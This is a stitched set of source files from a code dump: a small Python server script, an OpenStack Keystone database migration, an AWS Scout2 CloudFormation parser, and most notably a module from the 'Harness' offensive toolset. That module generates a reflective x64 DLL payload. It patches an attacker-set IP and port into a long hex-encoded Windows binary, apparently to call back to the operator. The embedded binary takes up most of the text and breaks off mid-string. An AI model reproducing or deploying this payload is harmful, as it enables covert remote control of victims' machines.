help="Generate data to populate the databases"
)
args = parser.parse_args()
setup_file = args.setup
populate = args.populate
setup = read_config(setup_file)
dbs = connect_dbs(setup)
api.app.dbs = dbs
codes.codes = setup['codes']
codes.rev_codes = {v: k for k, v in setup['codes'].items()}
if populate:
populate_db(dbs)
run(api.app, host='0.0.0.0', port=8080)
|
mit
|
openstack/keystone
|
keystone/common/sql/expand_repo/versions/066_expand_add_role_and_project_option_tables.py
|
2
|
1880
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
from keystone.common import sql as ks_sql
def upgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
role_table = sql.Table('role', meta, autoload=True)
project_table = sql.Table('project', meta, autoload=True)
role_resource_options_table = sql.Table(
'role_option',
meta,
sql.Column('role_id', sql.String(64), sql.ForeignKey(role_table.c.id,
ondelete='CASCADE'), nullable=False, primary_key=True),
sql.Column('option_id', sql.String(4), nullable=False,
primary_key=True),
sql.Column('option_value', ks_sql.JsonBlob, nullable=True),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
project_resource_options_table = sql.Table(
'project_option',
meta,
sql.Column('project_id', sql.String(64),
sql.ForeignKey(project_table.c.id, ondelete='CASCADE'),
nullable=False, primary_key=True),
sql.Column('option_id', sql.String(4), nullable=False,
primary_key=True),
sql.Column('option_value', ks_sql.JsonBlob, nullable=True),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
project_resource_options_table.create()
role_resource_options_table.create()
|
apache-2.0
|
SecurityFTW/cs-suite
|
tools/Scout2/AWSScout2/services/cloudformation.py
|
3
|
1472
|
# -*- coding: utf-8 -*-
import json
from AWSScout2.configs.regions import RegionalServiceConfig, RegionConfig, api_clients
########################################
# CloudFormationRegionConfig
########################################
class CloudFormationRegionConfig(RegionConfig):
"""
CloudFormation configuration for a single AWS region
"""
def parse_stack(self, global_params, region, stack):
"""
Parse a single stack and fetch additional attributes
:param global_params: Parameters shared for all regions
:param region: Name of the AWS region
        :param stack: Stack definition dictionary returned by the CloudFormation API
"""
stack['id'] = stack.pop('StackId')
stack['name'] = stack.pop('StackName')
stack_policy = api_clients[region].get_stack_policy(StackName = stack['name'])
if 'StackPolicyBody' in stack_policy:
stack['policy'] = json.loads(stack_policy['StackPolicyBody'])
self.stacks[stack['name']] = stack
########################################
# CloudFormationConfig
########################################
class CloudFormationConfig(RegionalServiceConfig):
"""
CloudFormation configuration for all AWS regions
"""
region_config_class = CloudFormationRegionConfig
def __init__(self, service_metadata, thread_config = 4):
super(CloudFormationConfig, self).__init__(service_metadata, thread_config)
|
gpl-3.0
|
liorvh/Harness
|
harness/modules/payloads/x64/dll/ReflectiveHarness_x64.py
|
2
|
241621
|
'''
Harness Toolset
Copyright (c) 2015 Rich Kelley, RK5DEVMAIL[A T]gmail[D O T]com
'''
from harness.core import module
class Module(module.ModuleFrame):

    about = {
        'name': 'HarnessEXE_x64',
        'info': 'Generate Reflective Payload (x64)',
        'author': 'Rich',
        'contact': '@RGKelley5',
        'version': '0.1'
    }

    def __init__(self):
        module.ModuleFrame.__init__(self, self.about)
        self.add_option('IP', "0.0.0.0", "str")
        self.add_option('PORT', "80", "int")

    def run_module(self):
        PORT = self.options.PORT
        IP = self.options.IP
        ip_hex = ["{:02x}".format(i) for i in map(int, IP.split("."))]
        _port = format(PORT, "04x")
        port_hex = [_port[i:i+2] for i in range(0, len(_port), 2)]
        port_hex.reverse()
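        # Worked example (illustrative values, not the module defaults):
        # with IP = "192.168.1.10" and PORT = 4444,
        #   ip_hex   -> ['c0', 'a8', '01', '0a']  (one hex byte per octet)
        #   _port    -> '115c'                    (4444 as four hex digits)
        #   port_hex -> ['5c', '11']              (byte pairs reversed into
        #                                          little-endian order)
        # These hex bytes are presumably patched into the raw payload defined below.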
raw_code = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fd043a07b9655454b9655454b9655454ff34b454dc655454ff348b54b3655454a737c754bb655454ff34b55492655454649a9f54bc655454b9655554da655454b437b154ba655454b4378854b8655454b4378f54b8655454b4378a54b865545452696368b965545400000000000000005045000064860600abefc3550000000000000000f00022200b020c0000e2000000140100000000009024000000100000000000800100000000100000000200000600000000000000060000000000000000300200000400000000000002006001000010000000000000100000000000000000100000000000001000000000000000000000100000008075010059000000dc7501005000000000100200e001000000000200f40b00000000000000000000002002002806000010030100380000000000000000000000000000000000000000000000000000006064010070000000000000000000000000000100900200000000000000000000000000000000000000000000000000002e74657874000000eee100000010000000e2000000040000000000000000000000000000200000602e72646174610000e27d000000000100007e000000e60000000000000000000000000000400000402e64617461000000187f000000800100005c000000640100000000000000000000000000400000c02e70646174610000f40b000000000200000c000000c00100000000000000000000000000400000402e72737263000000e0010000001002000002000000cc0100000000000000000000000000400000402e72656c6f63000028060000002002000008000000ce01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000488d0dd9e10000e934170000cccccccc48895c2410574883ec20488b19488bf94885db7445f0ff4b1075384885db7433488b0b4885c9740dff15f2f1000048c70300000000488b4b084885c9740de8f911000048c7430800000000488bcbe8e911000048c70700000000488b5c24384883c4205fc3cccccccccccccccccccccc48ff25e1f10000cccccccccccccccccc488bc45541564157488da848ffffff4881eca001000048c7442430feffffff488958084889701048897818488b055e6f01004833c448898590000000488d0d954d0100ff1527ef0000803db8dc0100010f84a1050000c605abdc0100014533ff4c897c24484c897c24404c897c24384c897c24684c897c2470418d4f18e876110000488bf048894424284885c0742533c0488906488946104c897e08c7461001000000488d0d5e4d0100e8510d0000488906eb03498bf7488975904885f6750bb90e000780e8c60e0000904c897d80b918000000e81f110000488bf848894424284885c0742533c0488907488947104c897f08c7471001000000488d0d0f4d0100e8fa0c0000488907eb03498bff48897d984885ff750bb90e000780e86f0e0000904c897c24784c8d442448488d1525520100488d0dfe510100ff15b0f0000085c07912488d0dd54c0100ff151fee0000e9a10300004c897c2450488b4c2448488b01488d542450ff502885c00f88d6000000488d0dde4c0100ff15f0ed0000c74588320000004c897c2458488b4c2450488b014533c94c8d442458418d5101ff501885c00f85930000000f1f440000488d0dd14c0100ff15b3ed00004c897c2460488b4c2458488b014c8d442460488d1552510100ff1085c07838488b4c2460488b014c8d4588488d55b0ff501885c0781641b9320000004c8d45b0418bd1488d4d20e8e70e0000488b4c2460488b01ff5010488b4c2458488b01ff5010488b4c2450488b014533c94c8d442458418d5101ff501885c00f8472ffffff488b4c2450488b01ff5010488d0d504c0100ff151aed0000488b4c24484
88b014c8d4c24404c8d05be500100488d5520ff501885c07912488d0d544c0100ff15eeec0000e970020000488b4c2440488b01488d558cff505085c07912488d0d7f4c0100ff15c9ec0000e94b020000837d8c007512488d0daf4c0100ff15b1ec0000e933020000488b4c2440488b014c8d4c24384c8d0540500100488d1569500100ff504885c07912488d0dc34c0100ff157dec0000e9ff010000488b4c2438488b01ff505085c07912488d0df24c0100ff155cec0000e9de010000488b4c24684885c97406488b01ff50104c897c2468488b4c2438488b01488d542468ff506885c07912488d0de74c0100ff1521ec0000e9a3010000488b5c24684885db750bb903400080e8280c0000cc488b4c24704885c97406488b01ff50104c897c2470488b034c8d442470488d15db4f0100488bcbff1085c07912488d0df34c0100ff15cdeb0000e94f01000048c745a000440000b9110000004c8d45a08d51f0ff15feed00004c8bf0488bc8ff15e2ed0000498b4e10488d157781010041b888000000900f10020f11010f104a100f1149100f1042200f1141200f104a300f1149300f1042400f1141400f104a500f1149500f1042600f114160488d89800000000f104a700f1149f0488d928000000049ffc875af498bceff155eed0000488b5c24704885db750bb903400080e8420b0000cc488b4d804885c97406488b01ff50104c897d80488b034c8d4580498bd6488bcbff906801000085c0790f488d0d584c0100ff15eaea0000eb6f488b5d804885db750bb903400080e8f50a0000cc488b4c24784885c97406488b01ff50104c897c2478488b034c8d442478488b17488bcbff908800000085c0790f488d0d504c0100ff159aea0000eb1f488b4c247848894c24284885c97406488b01ff5008488d4c2428e839010000488d0d824c0100ff156cea0000488b4c24484885c9740b488b01ff50104c897c2448488b4c24404885c9740b488b01ff50104c897c2440488b4c24384885c9740b488b01ff50104c897c2438488d0d4e4c0100ff1520ea000090488b4c24784885c97407488b01ff501090f0ff4f10752c488b0f4885c97409ff152aec00004c893f488b4f084885c97409e8350c00004c897f08488bcfe8290c000090488b4d804885c97407488b01ff501090f0ff4e10752c488b0e4885c97409ff15e8eb00004c893e488b4e084885c97409e8f30b00004c897e08488bcee8e70b000090488b4c24704885c97407488b01ff501090488b4c24684885c97406488b01ff5010488b8d900000004833cce8ca0a00004c8d9c24a0010000498b5b20498b7328498b7b30498be3415f415e5dc3cccccccccccccccccccccccccc488bc45541564157488d68a14881ecd000000048c745bffeffffff488958104889701848897820488b05326901004833c44889453f4c8bf148894db7b918000000e8820b0000488bf84889450733f64885c0743433c04889074889471048897708c7471001000000488d0dc94a0100ff153beb00004889074885c0750eb90e000780e8d9080000cc488bfe48897d074885ff750bb90e000780e8c208000090b8080000006689450f488d0d854a0100ff15fbea0000488945174885c0750bb90e000780e89808000090488d4de7ff15b5ea000090488d4d27ff15aaea000090488d0dba4a0100ff1554e80000b90c00000033d2448d41f5ff15a3ea00004c8bf88975ff4c8d450f488d55ff488bc8ff1564ea000085c07912488d0da14a0100ff151be80000e994000000488d0dc74a0100ff1509e800000f1045270f2945c7f20f104d37f20f114dd7498b0e4885c9750bb903400080e805080000cc488b01488d55e748895424304c897c2428488d55c748895424204533c941b818010000488b17ff90c80100008bd8488d0d974a0100ff15a9e7000085db790f488d0dc64a0100ff1598e70000eb14488b4defff158ce70000498bcfff15dbe9000090488d4d27ff15e0e9000090488d4de7ff15d5e9000090488d4d0fff15cae9000090f0ff4f10752c488b0f4885c97409ff157de90000488937488b4f084885c97409e88809000048897708488bcfe87c09000090498b0e4885c97406488b01ff5010488b4d3f4833cce8750800004c8d9c24d0000000498b5b28498b7330498b7b38498be3415f415e5dc3cccccccccccccccc4883ec28488d0d454a0100ff15dfe60000e86af7ffffb8010000004883c428c34883ec38ffca741c83fa05754a4d85c07445488b0547d401004989008d42fc4883c438c348890d35d40100488d0d2e4a0100ff1598e6000033c04c8d059fffffff48894424284533c933d233c989442420ff1581e60000b8010000004883c438c3cccccccccccccccccccccccccccccc488b094885c97407488b0148ff6010c3488b0424c3cccccccccccccccccccccc48894c240853415641574883ec4048896c247848897424384533ff4c89
6424284c896c242033f64533ed4533e44c897c2470e8b9ffffff488be8b84d5a00009066394500751a4863553c488d4ac04881f9bf0300007709813c2a50450000740548ffcdebdb65488b04256000000048897c243048896c2468488b481841bb010000004c8b71204d85f60f84d6010000bfffff0000418d5b020f1f840000000000498b5650450fb7464833c90f1f440000c1c90d0fb6023c61720a0fb6c083e8204898eb030fb6c04803c848ffc2664403c775dd81f95bbc4a6a0f85cc0000004d8b4e20bdffff00004963413c428bbc0888000000468b540f20468b5c0f244d03d14d03d90f1f40000f1f840000000000418b0a4903c94533c00fb6010f1f400041c1c80d0fbec0488d49014403c00fb60184c075eb4181f88e4e0eec74124181f8aafc0d7c74094181f854caaf917543428b440f1c410fb713498d0c014181f88e4e0eec7509448b2c914d03e9eb214181f8aafc0d7c7509448b24914d03e1eb0f4181f854caaf9175068b34914903f16603dd4983c2044983c3026685db0f856cffffff8bfde98b00000081f95d68fa3c0f85890000004d8b56204963423c428b9c1088000000468b441320468b4c13244d03c24d03ca660f1f840000000000418b104903d233c90fb6020f1f440000c1c90d0fbec0488d520103c80fb60284c075ed81f9b80a4c537518428b44131c410fb711498d0c02448b3c914d03fa664403df4983c0044983c102664585db75af4c897c247041bb01000000418d5b024d85ed740f4d85e4740a4885f674054d85ff750c4d8b364d85f60f8540feffff488b6c24684c637d3c33c941b8003000004c03fd448d4940418b57504c897c2468ffd6458b4754488bd54c8bf04d85c0741e482bc56666660f1f8400000000000fb60a488d5201884c10ff49ffc875f0450fb75706410fb747144d85d2744c4d8d4f2c4c03c866660f1f840000000000418b49f8418b11458b41fc4903ce4803d549ffca4d85c074190f1f80000000000fb60248ffc1488d52018841ff49ffc875ee4983c1284d85d275c5418baf900000004903ee8b450c85c00f849b00000049bf0000000000000080660f1f4400008bc84903ce41ffd58b5d108b7d004903de4903fe488bf048833b00745a0f1f004885ff742c488b174985d774244863463c0fb7d28b8c30880000008b4431108b4c311c4803ce482bd08b04914803c6eb10488b13488bce4883c2024903d641ffd44889034883c3084885ff74044883c70848833b0075a98b45204883c51485c00f857affffff4c8b7c24684c8b6c24204c8b642428488b7c2430488b742438488b6c24784d8bc64d2b47304183bfb4000000000f84ae000000458b9fb00000004d03de418b430485c00f849800000090418b13448bc84d8d53084983e9084903d649d1e9746e66660f1f840000000000410fb70249ffc90fb7c866c1e90c6683f90a750b25ff0f00004c010410eb3c6683f903750b25ff0f000044010410eb2b6683f901751525ff0f0000488d0c10498bc048c1e810660101eb106683f902750a25ff0f000066440104104983c2024d85c9759c418b43044c03d8418b430485c00f8569ffffff418b5f284533c033d24883c9ff4903deff5424704c8b442460ba01000000498bceffd3488bc34883c440415f415e5bc3cccccccccccccccccc48894c2408555741564883ec50488d6c243048895d4848897550488b056f6101004833c548894510488bf14885c9750733c0e92f010000ff1593e10000448d70014489750433c0894424284889442420458bce4c8bc633d233c9ff1578e100004863f8897d0085c0751aff1558e1000085c07e080fb7c00d000007808bc8e80d0100009081ff001000007d2f488bc74803c0488d480f483bc8770a48b9f0ffffffffffff0f4883e1f0488bc1e82f100000482be1488d5c2430eb0e488bcf4803c9e842080000488bd848895d08eb1133db48895d08488b7540448b75048b7d004885db750bb90e000780e8a1000000cc897c242848895c2420458bce4c8bc633d233c9ff15cfe0000085c0752a81ff001000007c08488bcbe8ab070000ff15a5e0000085c07e080fb7c00d000007808bc8e85a000000cc488bcbff15a0e20000488bf081ff001000007c08488bcbe8750700004885f6750bb90e000780e82e000000cc488bc6488b4d104833cde85e010000488b5d48488b7550488d6520415e5f5dc3cccccccccccccccccccccccccc33d248ff25ef5f0100cccccccccccccc40534883ec20488d050be30000488bd94889018b4208894108488b421048c741180000000048894110488bc84885c07406488b00ff5008488bc34883c4205bc340534883ec20488d05cbe20000488bd9488901488b49104885c97406488b01ff5010488b4b184885c9740c4883c4205b48ff25d1df00004883c4205bc3cccccc48895c2408574883ec20488d0587e20000488bd98bfa488901488b4910488
5c97406488b01ff5010488b4b184885c97406ff1591df000040f6c7017408488bcbe857010000488bc3488b5c24304883c4205fc3cccccccccccccccccccccccccc4883ec48488d052de20000894c24284889542430488d1515530100488d4c242048c7442438000000004889442420e87d0e0000cccccccccccccccccccccccccccccccccccccc66660f1f840000000000483b0db95e0100751148c1c11066f7c1ffff7502f3c348c1c910e989120000cc40534883ec2033db4d85c9750e4885c9750e4885d2752033c0eb2f4885c974174885d274124d85c97505668919ebe84d85c0751c668919e850150000bb160000008918e8781400008bc34883c4205bc34c8bd94c8bd24983f9ff751c4d2bd8410fb70066438904034d8d40026685c0742f49ffca75e9eb284c2bc1430fb70418664189034d8d5b026685c0740a49ffca740549ffc975e44d85c975046641891b4d85d20f856effffff4983f9ff750b66895c51fe418d4250eb90668919e8ca140000bb22000000e975ffffffe907050000cccccc40534883ec20488bd9e866150000488d05efe00000488903488bc34883c4205bc3cccccc488d05d9e00000488901e96d150000cc40534883ec40488bd9eb0f488bcbe88116000085c07413488bcbe8f10400004885c074e74883c4405bc3488d05afe00000488d542458488d4c242041b8010000004889442458e8d9140000488d057ee00000488d15b7510100488d4c24204889442420e8d00c0000cccccccc48895c2408574883ec20488d0553e000008bda488bf9488901e8e2140000f6c3017408488bcfe82dffffff488bc7488b5c24304883c4205fc3cccccc4c89442418534883ec20498bd883fa01757de88920000085c0750733c0e937010000e8bd1a000085c07507e890200000ebe9e859310000ff1513dd00004889059cdb0100e8c328000048890528b70100e87720000085c07907e8061b0000ebcbe80b24000085c0781fe8be26000085c0781633c9e8eb1c000085c0750bff05edb60100e9cc000000e86f230000ebca85d275528b05d7b6010085c00f8e7affffffffc88905c7b601003915a9bc01007505e89e1c0000e8291b00004885db7510e837230000e89a1a0000e8f11f0000904885db757f833da45d0100ff7476e8811a0000eb6f83fa02755e8b0d905d0100e8272a00004885c0755aba780400008d4801e8092f0000488bd84885c00f8408ffffff488bd08b0d645d0100e8172a0000488bcb85c0741633d2e8f1180000ff1523dc0000890348834b08ffeb16e8e5020000e9d3feffff83fa03750733c9e8e8170000b8010000004883c4205bc3cc48895c24084889742410574883ec20498bf88bda488bf183fa017505e8df2600004c8bc78bd3488bce488b5c2430488b7424384883c4205fe903000000cccccc488bc4488958204c89401889501048894808565741564883ec50498bf08bda4c8bf1ba010000008950b885db750f391d9cb50100750733c0e9d20000008d43ff83f8017738488b055cde00004885c0740a8bd3ffd08bd08944242085d274174c8bc68bd3498bcee8f4fdffff8bd08944242085c0750733c0e9920000004c8bc68bd3498bcee8d6f3ffff8bf88944242083fb01753485c075304c8bc633d2498bcee8baf3ffff4c8bc633d2498bcee8adfdffff488b05eedd00004885c0740a4c8bc633d2498bceffd085db740583fb0375374c8bc68bd3498bcee881fdfffff7d81bc923cf8bf9894c2420741c488b05b4dd00004885c074104c8bc68bd3498bceffd08bf8894424208bc7eb0233c0488b9c24880000004883c450415e5f5ec340534883ec20ba080000008d4a18e83d2d0000488bc8488bd8ff1581da0000488905ead80100488905dbd801004885db75058d4318eb064883230033c04883c4205bc3cc48895c2408488974241048897c24184154415641574883ec204c8be1e8cb1b000090488b0da3d80100ff1535da00004c8bf0488b0d8bd80100ff1525da0000488bd8493bc60f829b000000488bf8492bfe4c8d7f084983ff080f8287000000498bcee879300000488bf0493bc77355ba00100000483bc2480f42d04803d0483bd07211498bcee87d2d000033db4885c0751aeb0233db488d5620483bd67249498bcee8612d00004885c0743c48c1ff03488d1cf8488bc8ff159fd9000048890508d80100498bccff158fd90000488903488d4b08ff1582d90000488905e3d70100498bdceb0233dbe80b1b0000488bc3488b5c2440488b742448488b7c24504883c420415f415e415cc3cccc4883ec28e8ebfeffff48f7d81bc0f7d8ffc84883c428c3cc4885c97437534883ec204c8bc1488b0d34b9010033d2ff152cd9000085c07517e88f0f0000488bd8ff15d2d800008bc8e89f0f000089034883c4205bc3cccccc48895c24084889742410574883ec20488bd94883f9e0777cbf010000004885c9480f45f9488b0ddd
b801004885c97520e8832f0000b91e000000e8ed2f0000b9ff000000e81b170000488b0db8b801004c8bc733d2ff15b5d80000488bf04885c0752c3905f7c10100740e488bcbe81111000085c0740debabe8f60e0000c7000c000000e8eb0e0000c7000c000000488bc6eb12e8eb100000e8d60e0000c7000c00000033c0488b5c2430488b7424384883c4205fc3cccc48895c241048896c241856574154415641574883ec20418b780c4c8be1498bc8498bf14d8bf04c8bfae8da4b00004d8b14244c89168be885ff747449634610ffcf488d14bf488d1c9049035f083b6b047ee53b6b087fe0498b0f488d5424504533c0ff15f8d700004c634310448b4b0c4c03442450448b1033c94585c97417498d500c486302493bc2740bffc14883c214413bc972ed413bc9739c498b0424488d0c8949634c8810488b0c0148890e488b5c2458488b6c2460488bc64883c420415f415e415c5f5ec3cccccc488bc4488958084889681048897018488978204154415641574883ec208b7a0c488b6c2470488bda488bcb488bd5458be133f6e8044b0000448bf085ff7505e88c4b00004c8b5424684c8b4424608bd741830aff418308ff85ff742a4c8b5d084c637b10448d4aff4b8d0c89498d048b463b7438047e07463b7438087e08418bd14585c975de85d274138d42ff488d148048634310488d34904803750833d285ff74604533c948634b104903c948034d084885f6740f8b460439017e228b46083941047f1a443b217c15443b61047f0f418338ff75034189108d4201418902ffc24983c1143bd772bd418b0083f8ff7412488d0c8048634310488d048848034508eb0a418320004183220033c0488b5c2440488b6c2448488b742450488b7c24584883c420415f415e415cc348895c240848896c2410565741564883ec204c8d4c2450498bf8488beae8e6fdffff488bd5488bcf4c8bf0e8e04900008b5f0c8bf0eb27ffcbe822120000488d149b488b8028010000488d0c90486347104803c83b71047e053b71087e0685db75d533c94885c975064183c9ffeb04448b49044c8bc7488bd5498bcee80b440000488b5c2440488b6c24484883c420415e5f5ec348895c240848896c24104889742418574883ec40498bf1498be8488bda488bf9e8a711000048899838010000488b1fe898110000488b5338488b4c24784c8b4c2470c7442438010000004889903001000033db48895c2430895c242848894c2420488b0f4c8bc6488bd5e81d450000e858110000488b8c2480000000488b6c2458488b742460488998380100008d4301488b5c2450c701010000004883c4405fc3cccccc488bc44c8948204c8940184889501048894808534883ec60488bd98360d800488948e04c8940e8e8fc1000004c8b80e0000000488d5424488b0b41ffd0c744244000000000eb008b4424404883c4605bc3cccccc40534883ec20488bd9488911e8c3100000483b9820010000730ee8b5100000488b8820010000eb0233c948894b08e8a110000048899820010000488bc34883c4205bc3cc48895c2408574883ec20488bf9e87e100000483bb8200100007405e8b4480000e86b100000488b9820010000eb09483bfb7419488b5b084885db75f2e893480000488b5c24304883c4205fc3e83f100000488b4b0848898820010000ebe3cccc4883ec28e827100000488b80280100004883c428c3cccccc4883ec28e80f100000488b80300100004883c428c3cccccc40534883ec20488bd9e8f20f0000488b9020010000eb0948391a7412488b52084885d275f28d42014883c4205bc333c0ebf6cccc40534883ec20488bd9e8be0f0000488998280100004883c4205bc3cc40534883ec20488bd9e8a20f0000488998300100004883c4205bc3cc4055488dac2450fbffff4881ecb0050000488b05f45201004833c4488985a00400004c8b95f8040000488d053cd600004c8bd9488d4c24300f10000f1048100f11010f1040200f1149100f1048300f1141200f1040400f1149300f1048500f1141400f1040600f1149500f1088800000000f1141600f104070488b80900000000f1141700f11898000000048898190000000498b0b488d05cc3e00004889442450488b85e004000048895580498b124889442460486385e80400004889442468488b85f00400004c8944247048894424780fb685000500004c894c245848894588498b42404c8d4424304889442428488d45d04533c9488944242048c7459020059319ff159bd20000488b8da00400004833cce834f3ffff4881c4b00500005dc3cccccc48895c24104889742418574883ec40498bd9498bf8488bf14889542450e84e0e0000488b530848899028010000e83e0e0000488b563848899030010000e82e0e0000488b5338448b02488d5424504c8bcb4c03802801000033c0488bce894424384889442430894424284c894424204c8bc7e8b9410000488b5
c2458488b7424604883c4405fc3cc488bc44889580848896810488970184889782041564883ec204d8b5138488bf24d8bf0418b1a488be9498bd148c1e304488bce498bf94903da4c8d4304e86a460000448b5b04448b5504418bc34183e302ba0100000023c24180e266440f44d84585db74134c8bcf4d8bc6488bd6488bcde8fa2500008bd0488b5c2430488b6c2438488b742440488b7c24488bc24883c420415ec3cccccccccccccccccccccccccccccccccc66660f1f8400000000004883ec104c8914244c895c24084d33db4c8d5424184c2bd04d0f42d3654c8b1c25100000004d3bd37316664181e200f04d8d9b00f0ffff41c603004d3bd375f04c8b14244c8b5c24084883c410c3cccc48895c241048897c241855488bec4883ec600f280547d400000f280d50d40000488bda488bf90f2945c00f28054fd400000f294dd00f280d54d400000f2945e00f294df04885d27416f602107411488b094883e908488b01488b5830ff5040488d5510488bcb48897de848895df0ff158cd00000488bd048894510488945f84885db741bf60308b9004099017405894de0eb0c8b45e04885d20f44c18945e0448b45d88b55c48b4dc04c8d4de0ff1555d000004c8d5c2460498b5b18498b7b20498be35dc3cccccc4883ec28488bc2488d5111488d4811e84445000085c00f94c04883c428c3cccc48895c2408574883ec20488d05afd300008bda488bf9488901e882450000f6c3017408488bcfe879f1ffff488bc7488b5c24304883c4205fc3cccccccccccccccccccccccccccccccccccccccccc66660f1f8400000000004c8bd90fb6d24983f8100f825c0100000fba2508b9010001730e57488bf98bc2498bc8f3aa5feb6d49b90101010101010101490fafd10fba25e2b80100020f829c0000004983f840721e48f7d983e10774064c2bc14989134903cb4d8bc84983e03f49c1e906753f4d8bc84983e00749c1e903741166666690904889114883c10849ffc975f44d85c0740a881148ffc149ffc875f6498bc3c30f1f80000000006666669066669048891148895108488951104883c140488951d8488951e049ffc9488951e8488951f0488951f875d8eb97666666666666660f1f84000000000066480f6ec2660f60c0f6c10f74160f1101488bc14883e00f4883c110482bc84e8d4400f04d8bc849c1e9077432eb01900f29010f2941104881c1800000000f2941a00f2941b049ffc90f2941c00f2941d00f2941e00f2941f075d54983e07f4d8bc849c1e90474140f1f8400000000000f29014883c11049ffc975f44983e00f7406410f114408f0498bc3c349b90101010101010101490fafd14c8d0d7fcdffff438b8481953200004c03c84903c8498bc341ffe1ee320000eb320000fc320000e73200001033000005330000f9320000e4320000253300001d33000014330000ef3200000c33000001330000f5320000e03200006666660f1f840000000000488951f18951f9668951fd8851ffc3488951f5ebf2488951f28951fa668951fec3488951f38951fb8851ffc3488951f48951fcc3488951f6668951fec3488951f78851ffc3488951f8c3cccce903000000cccccc488d0579500000488d0dbe450000488905ef4e0100488d050451000048890dd94e0100488905e24e0100488d053751000048890dec4e0100488905d54e0100488d05aa510000488905cf4e0100488d059c450000488905d14e0100488d05c6500000488905cb4e0100488d0518500000488905c54e0100488d05f2500000488905bf4e0100c3cccc40534883ec20488bd9ff1505cd0000b90100000089055aac0100e899510000488bcbe83d1f0000833d46ac010000750ab901000000e87e510000b9090400c04883c4205be9fb1e0000cccccc48894c24084883ec38b917000000e80bb8000085c07407b902000000cd29488d0d33a70100e86e190000488b4424384889051aa80100488d4424384883c008488905aaa70100488b0503a8010048890574a60100488b44244048890578a70100c7054ea60100090400c0c70548a6010001000000c70552a6010001000000b808000000486bc000488d0d4aa6010048c7040102000000b808000000486bc000488b0d724b010048894c0420b808000000486bc001488b0d654b010048894c0420488d0da9cf0000e8e8feffff4883c438c3cccccc488bc448895810488970184889782055488da848fbffff4881ecb0050000488b051f4b01004833c4488985a0040000418bf88bf28bd983f9ff7405e8585000008364243000488d4c243433d241b894000000e8cdfbffff488d442430488d4dd04889442420488d45d04889442428e8e1170000488b85b8040000488985c8000000488d85b8040000897424304883c008897c243448894568488b85b80400004889442440ff154acb0000488d4c24208bf8e88e1d000085c0751085ff750c83fbff74078bcbe8ce
4f0000488b8da00400004833cce8abebffff4c8d9c24b0050000498b5b18498b7320498b7b28498be35dc3cccc48890d61aa0100c348895c240848896c24104889742418574883ec30488be9488b0d42aa0100418bd9498bf8488bf2ff1593ca0000448bcb4c8bc7488bd6488bcd4885c07417488b5c2440488b6c2448488b7424504883c4305f48ffe0488b4424604889442420e824000000cccccccc4883ec384883642420004533c94533c033d233c9e87fffffff4883c438c3cccc4883ec28b917000000e8b8b5000085c07407b905000000cd2941b801000000ba170400c0418d4801e84ffeffffb9170400c04883c428e9651c0000cc4883ec28e8270600004885c07509488d05fb4a0100eb044883c0144883c428c348895c2408574883ec208bf9e8ff0500004885c07509488d05d34a0100eb044883c0148938e8e6050000488d1dbb4a01004885c07404488d58108bcfe82f0000008903488b5c24304883c4205fc3cccc4883ec28e8b70500004885c07509488d05874a0100eb044883c0104883c428c34c8d150d49010033d24d8bc2448d4a08413b08742fffc24d03c14863c24883f82d72ed8d41ed83f8117706b80d000000c381c144ffffffb81600000083f90e410f46c1c34863c2418b44c204c3cccccc40534883ec204883610800488d0502cd0000c6411000488901488b12488bd9e8e4000000488bc34883c4205bc3cccccc488d05ddcc0000488901488b02c641100048894108488bc1c3cccccc40534883ec204883610800488d05b6cc0000488bd9488901c6411000e81b000000488bc34883c4205bc3cccc488d0595cc0000488901e9dd000000cc48895c2408574883ec20488bfa488bd9483bca7421e8c2000000807f1000740e488b5708488bcbe854000000eb08488b470848894308488bc3488b5c24304883c4205fc348895c2408574883ec20488d0537cc00008bda488bf9488901e87a000000f6c3017408488bcfe8d9e9ffff488bc7488b5c24304883c4205fc3cccccc4885d2745448895c24084889742410574883ec20488bf1488bca488bdae84a4d0000488bf8488d4801e8e6eeffff488946084885c07413488d57014c8bc3488bc8e8b24c0000c6461001488b5c2430488b7424384883c4205fc3cccc40534883ec2080791000488bd97409488b4908e860eeffff4883630800c64310004883c4205bc3cc4883790800488d058ccb0000480f454108c3cccc40534883ec20488bd9488b0d14a70100ff1566c700004885c07410488bcbffd085c07407b801000000eb0233c04883c4205bc3cc48890de9a60100c348895c240848896c24104889742418574883ec20488bf28bf9e8560300004533c9488bd84885c00f8488010000488b90a0000000488bca39397410488d82c00000004883c110483bc872ec488d82c0000000483bc8730439397403498bc94885c90f844e0100004c8b41084d85c00f84410100004983f805750d4c894908418d40fce9300100004983f801750883c8ffe922010000488baba80000004889b3a8000000837904080f85f2000000ba30000000488b83a00000004883c2104c894c02f84881fac00000007ce781398e0000c08bbbb0000000750fc783b000000083000000e9a10000008139900000c0750fc783b000000081000000e98a0000008139910000c0750cc783b000000084000000eb768139930000c0750cc783b000000085000000eb6281398d0000c0750cc783b000000082000000eb4e81398f0000c0750cc783b000000086000000eb3a8139920000c0750cc783b00000008a000000eb268139b50200c0750cc783b00000008d000000eb128139b40200c0750ac783b00000008e0000008b93b0000000b90800000041ffd089bbb0000000eb0a4c8949088b490441ffd04889aba8000000e9d8feffff33c0488b5c2430488b6c2438488b7424404883c4205fc3b863736de03bc875078bc8e924feffff33c0c3cc4885c90f842901000048895c2410574883ec20488bd9488b49384885c97405e8fcebffff488b4b484885c97405e8eeebffff488b4b584885c97405e8e0ebffff488b4b684885c97405e8d2ebffff488b4b704885c97405e8